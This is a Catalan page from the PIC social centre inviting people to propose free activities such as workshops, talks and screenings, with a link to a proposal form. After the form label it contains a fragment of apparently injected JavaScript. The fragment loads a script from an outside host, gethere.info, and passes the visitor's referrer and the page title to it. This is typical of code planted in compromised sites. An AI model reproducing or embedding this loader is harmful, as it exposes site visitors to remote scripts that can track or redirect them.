Oferir una activitat

El PIC és un centre social autogestionat. Això vol dir que el seu bon funcionament depèn de que totes les que ens el sentim nostre ens corresponsabilitzem de la seva marxa i l’omplim de contingut. Pots col.laborar donant un cop de mà o aportant materials, però principalment proposant-nos una activitat, ja sigui un taller, una xerrada, un debat, una projecció… En general programem activitats relacionades amb tres eixos temàtics que ens interessen especialment: pensament crític i moviments socials; creixement personal (englobant des de qüestions relacionades amb l’autogestió de la salut fins a la creació artística o les teràpies alternatives); i habilitats pràctiques relacionades amb la vida al camp i/o en comunitat, des d’una perspectiva autònoma i anticapitalista.

Si teniu ganes de conduir un diumenge una activitat relacionada amb aquestes temàtiques ompliu el formulari que trobareu al següent enllaç amb tota la informació necessària. Les persones que coordinem la programació del centre social valorarem la proposta i si ho veiem viable ens posarem en contacte amb vosaltres per concretar la data. Heu de tenir en compte que totes les activitats que es realitzen al PIC són gratuïtes i que només demanem una aportació fixe a les participants en cas que calgui cobrir despeses de materials i/o de transport.

Formulari per proposar activitats pel PIC s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

subscriu-te al PIC